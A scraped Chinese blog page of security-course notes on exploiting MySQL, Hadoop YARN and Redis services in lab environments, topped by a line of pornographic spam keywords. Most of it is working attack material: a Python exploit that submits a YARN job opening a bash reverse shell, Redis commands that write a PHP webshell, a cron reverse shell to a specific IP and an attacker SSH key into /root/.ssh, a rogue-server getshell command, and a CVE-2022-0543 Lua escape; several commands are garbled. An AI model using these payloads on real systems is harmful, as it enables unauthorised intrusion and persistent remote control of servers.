国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)

這篇具有很好參考價(jià)值的文章主要介紹了網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

第54天 服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE

知識點(diǎn):

1、服務(wù)攻防數(shù)據(jù)庫類型安全
2、Redis&Hadoop&Mysql安全
3、Mysql-CVE-2012-2122漏洞
4、Hadoop-配置不當(dāng)未授權(quán)三重奏&RCE漏洞
3、Redis-配置不當(dāng)未授權(quán)三重奏&RCE兩漏洞

#章節(jié)內(nèi)容:
常見服務(wù)應(yīng)用的安全測試:
1、配置不當(dāng)-未授權(quán)訪問
2、安全機(jī)制特定安全漏洞
3、安全機(jī)制弱口令爆破攻擊

#前置知識:
應(yīng)用服務(wù)安全測試流程:見圖
組合猜測(由于nat會(huì)導(dǎo)致端口掃描不到真實(shí)端口信息)、信息來源(報(bào)錯(cuò)、特征)
1、判斷服務(wù)開放情況-端口掃描&組合應(yīng)用等
2、判斷服務(wù)類型歸屬數(shù)據(jù)庫&文件傳翰&通訊等
3、判斷服務(wù)利用方式特定漏洞&未授權(quán)&弱口令等
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全

演示案例:

Mysq-未授權(quán)訪問-CVE-2012-2122利用
Hadoop-.未授權(quán)訪問-內(nèi)置配合命令執(zhí)行RCE
Redis-未授權(quán)訪問-Webshelle&任務(wù)&密匙&RCE等

Mysq-未授權(quán)訪問-CVE-2012-2122利用
復(fù)現(xiàn)環(huán)境:vulhub
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全

for i in `seq 1 1000`; do mysql -uroot -pwrong -h you-ip -P3306 ; done 

網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全

漏洞復(fù)現(xiàn):

1、vulhub開啟漏洞環(huán)境
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全
2、攻擊機(jī):kali掃描目標(biāo)端口并驗(yàn)證
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全

Hadoop-未授權(quán)訪問-內(nèi)置配合命令執(zhí)行RCE
復(fù)現(xiàn)環(huán)境:vulfocus
思路:訪問特定

#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

漏洞復(fù)現(xiàn):
1、vulhub搭建hadoop漏洞環(huán)境
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全
2、攻擊機(jī)kali開啟nc監(jiān)聽端口,使用exp攻擊反彈shell
網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE),網(wǎng)絡(luò)安全全棧學(xué)習(xí)筆記,web安全,筆記,redis,網(wǎng)絡(luò),安全
#Redis-未授權(quán)訪問-Webshell&任務(wù)&密匙&RCE等
1、寫Webshell需得到Web路徑
利用條件:Web目錄權(quán)限可讀寫
config set dir /tmp
#設(shè)置WEB寫入目錄
config set dbfilename1.php設(shè)置寫入文件名
set test"c?php phpinfo):?>"#設(shè)置寫入文件代碼
bgsave
#保存執(zhí)行
save
#保存執(zhí)行
注意:部分沒目錄權(quán)限讀寫權(quán)限

2、寫定時(shí)任務(wù)反單shell
利用條件:
允許異地登錄
安全模式protected-mode處于關(guān)閉狀態(tài)
config set dir /var/spool/cron
set yy “ninin*****bash->&/dev/tcp/47.94.236.117/55550>&1nnn”
config set dbfilename x
save
注意:
centos會(huì)忽略亂碼去執(zhí)行格式正確的任務(wù)計(jì)劃
而ubuntu并不會(huì)忽略這些亂L碼,所以導(dǎo)致命令執(zhí)行失敗

3、寫入Linux ssh-key公鑰
利用條件:
允許異地登錄
Redis服務(wù)使用ROOT賬號啟動(dòng)
安全模式protected-mode處于關(guān)閉狀態(tài)
允許使用密鑰登錄,即可遠(yuǎn)程寫入一個(gè)公鑰,直接登錄遠(yuǎn)程服務(wù)器
ssh-keygen-t rsa
cd /root/.ssh/
(echo -e “nin”;cat id_rsa.pub;echo-e"nin")>key.txt
cat key.txt redis-cli-h 118.31.57.214 -x set xxx
config set dir /root/.ssh/
config set dbfilename authorized keys
save
cd /root/.ssh/
ssh -i id rsa root@118.31.57.214

4、RCE自動(dòng)化利用腳本-vulfocus
https://github.com/vulhub/redis-rogue-getshell
python redis-.master…py-f123.58.236.76-p9830-L47.94.236.117-P8888-f
RedisModulesSDK/exp.so -c “id”

5.新漏洞-沙箱繞過RCE CVE-2022-0543-vulfocus
Poc:執(zhí)行id命令
eval 'local io_I package.loadlib(“/usr/lib/x86_64-linux-gnu/liblua5.1.so.0”,“l(fā)uaopen_io”);
local io io_I();local f=io.popen(“id”,“r”);local res f.read(“a”);f:close();return res’o
參考鏈接:https://blog.csdn.net/qq_40882763/article/details/129742604?spm=1001.2101.3001.6650.2&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-129742604-blog-130589818.235%5Ev40%5Epc_relevant_3m_sort_dl_base1&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-2-129742604-blog-130589818.235%5Ev40%5Epc_relevant_3m_sort_dl_base1&utm_relevant_index=5
老哥寫的很詳細(xì),后期我也會(huì)逐個(gè)復(fù)現(xiàn)文章來源地址http://www.zghlxwxcb.cn/news/detail-817638.html

到了這里,關(guān)于網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 網(wǎng)絡(luò)安全與攻防-常見網(wǎng)絡(luò)安全攻防

    網(wǎng)絡(luò)安全與攻防-常見網(wǎng)絡(luò)安全攻防

    目錄 攻擊手段防御策略 阻斷服務(wù)攻擊(DoS) 地址解析欺騙(ARP攻擊)(Address Resolution Protocol spoofing) 跨站腳本攻擊(XSS) SQL注入 跨站請求偽造(csrf) ?HTTPS中間人攻擊 小結(jié) 阻斷服務(wù)攻擊(DoS) 阻斷服務(wù)攻擊(Denial-of service attack),想辦法將目標(biāo)網(wǎng)絡(luò)資源用盡(自己的服

    2023年04月25日
    瀏覽(26)
  • <網(wǎng)絡(luò)安全>《35 網(wǎng)絡(luò)攻防專業(yè)課<第一課 - 網(wǎng)絡(luò)攻防準(zhǔn)備>》

    <網(wǎng)絡(luò)安全>《35 網(wǎng)絡(luò)攻防專業(yè)課<第一課 - 網(wǎng)絡(luò)攻防準(zhǔn)備>》

    認(rèn)識黑客 認(rèn)識端口 常見術(shù)語與命令 網(wǎng)絡(luò)攻擊流程 VMWare虛擬環(huán)境靶機(jī)搭建 白帽黑客 是指有能力破壞電腦安全但不具惡意目的黑客。 灰帽黑客 是指對于倫理和法律態(tài)度不明的黑客。 黑帽黑客 經(jīng)常用于區(qū)別于一般(正面的)理性黑客,一個(gè)犯罪和黑客的合成詞。 黑客:Hack

    2024年02月19日
    瀏覽(26)
  • 網(wǎng)絡(luò)安全攻防:ZigBee安全

    1.?ZigBee簡介 ZigBee(又稱紫蜂協(xié)議)是基于IEEE802.15.4標(biāo)準(zhǔn)的低功耗局域網(wǎng)協(xié)議。根據(jù)國際標(biāo)準(zhǔn)規(guī)定,ZigBee技術(shù)是一種短距離、低功耗的無線通信技術(shù)。ZigBee來源于蜜蜂的八字舞,由于蜜蜂(Bee)是靠飛翔和“嗡嗡”(Zig)地抖動(dòng)翅膀的“舞蹈”來與同伴傳遞花粉所在方位信息

    2024年02月05日
    瀏覽(30)
  • 網(wǎng)絡(luò)攻防演練.網(wǎng)絡(luò)安全.學(xué)習(xí)

    網(wǎng)絡(luò)安全攻防演練是指通過模擬各種網(wǎng)絡(luò)攻擊手段,來測試自身安全防御能力和應(yīng)對能力的一種演練活動(dòng)。本文總結(jié)了網(wǎng)絡(luò)安全攻防演練的重要性、準(zhǔn)備工作以及演練過程中需要注意的事項(xiàng)。 一、網(wǎng)絡(luò)安全攻防演練的重要性 網(wǎng)絡(luò)安全攻防演練是對自身網(wǎng)絡(luò)安全現(xiàn)狀的一種全面

    2024年02月13日
    瀏覽(25)
  • 安全意識培訓(xùn):如何提高員工網(wǎng)絡(luò)安全意識?

    安全意識培訓(xùn):如何提高員工網(wǎng)絡(luò)安全意識?

    隨著網(wǎng)絡(luò)技術(shù)的不斷發(fā)展和應(yīng)用,網(wǎng)絡(luò)安全已經(jīng)成為企業(yè)必須關(guān)注和重視的問題。尤其是在今天,企業(yè)數(shù)字化轉(zhuǎn)型的大背景下,網(wǎng)絡(luò)安全問題日益凸顯。對于企業(yè)而言,員工是企業(yè)安全的第一道防線,提高員工的網(wǎng)絡(luò)安全意識已經(jīng)成為企業(yè)安全管理的關(guān)鍵所在。本文將從以下

    2024年02月12日
    瀏覽(25)
  • 網(wǎng)絡(luò)安全應(yīng)急響應(yīng)預(yù)案培訓(xùn)

    應(yīng)急響應(yīng)預(yù)案的培訓(xùn)是為了更好地應(yīng)對網(wǎng)絡(luò)突發(fā)狀況,實(shí)施演 練計(jì)劃所做的每一項(xiàng)工作,其培訓(xùn)過程主要針對應(yīng)急預(yù)案涉及的相 關(guān)內(nèi)容進(jìn)行培訓(xùn)學(xué)習(xí)。做好應(yīng)急預(yù)案的培訓(xùn)工作能使各級人員明確 自身職責(zé),是做好應(yīng)急響應(yīng)工作的基礎(chǔ)與前提。應(yīng)急響應(yīng)預(yù)案的培 訓(xùn)分為以下幾

    2024年02月11日
    瀏覽(34)
  • 第55天:服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysql&未授權(quán)訪問&RCE

    第55天:服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysql&未授權(quán)訪問&RCE

    思維導(dǎo)圖: 常見服務(wù)的安全測試: 服務(wù)安全流程: 案例一:Mysql-未授權(quán)訪問-CVE-2012-2122 利用 案例二: Hadoop-未授權(quán)訪問-內(nèi)置配合命令執(zhí)行 RCE 案例三:Redis-未授權(quán)訪問-Webshell任務(wù)密匙RCE 等 寫入webshell ?寫入計(jì)劃任務(wù)反彈shell ssh密鑰鏈接 ?編輯利用自動(dòng)化腳本去getshell redi

    2024年04月27日
    瀏覽(25)
  • 【網(wǎng)絡(luò)安全】-- 網(wǎng)絡(luò)滲透技術(shù)攻防(--更新中)

    1.1.1 什么是網(wǎng)絡(luò)滲透攻擊 “網(wǎng)絡(luò)滲透攻擊”是對大型的網(wǎng)絡(luò)主機(jī)服務(wù)器群組采用的一種迂回漸進(jìn)式的攻擊方法,通過長期而有計(jì)劃的逐步滲透攻擊進(jìn)入網(wǎng)絡(luò),最終控制整個(gè)網(wǎng)絡(luò)。 1.1.2 網(wǎng)絡(luò)滲透測試的意義 滲透測試是受信任的第三方進(jìn)行的一種評估網(wǎng)絡(luò)安全的活動(dòng),它通過運(yùn)

    2024年02月13日
    瀏覽(23)
  • 網(wǎng)絡(luò)安全工具合計(jì)(攻防工具)

    網(wǎng)絡(luò)安全工具合計(jì)(攻防工具)

    目錄 All-Defense-Tool 免責(zé)聲明 半/全自動(dòng)化利用工具 信息收集工具 資產(chǎn)發(fā)現(xiàn)工具 子域名收集工具 目錄掃描工具 指紋識別工具 端口掃描工具 Burp插件 瀏覽器插件 郵箱釣魚 社工個(gè)人信息收集類 APP/公眾號/小程序相關(guān)工具 常用小工具 漏洞利用工具 漏洞掃描框架/工具 中間件/應(yīng)用

    2024年02月13日
    瀏覽(24)
  • 網(wǎng)絡(luò)安全攻防演練項(xiàng)目介紹

    有很多朋友問我寫的攻防演練是什么? 本文給予回答 網(wǎng)絡(luò)安全攻防演練是公安部組織的面向稅務(wù)、電力、電信、銀行、鐵路、財(cái)政、廣電、水利、教育、互聯(lián)網(wǎng)、檢察院、法院、石油、交通等行業(yè)的政府單位/公司,開展的實(shí)戰(zhàn)攻防演練,也簡稱為護(hù)網(wǎng)。 攻防演練主要目標(biāo)是

    2024年02月09日
    瀏覽(18)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包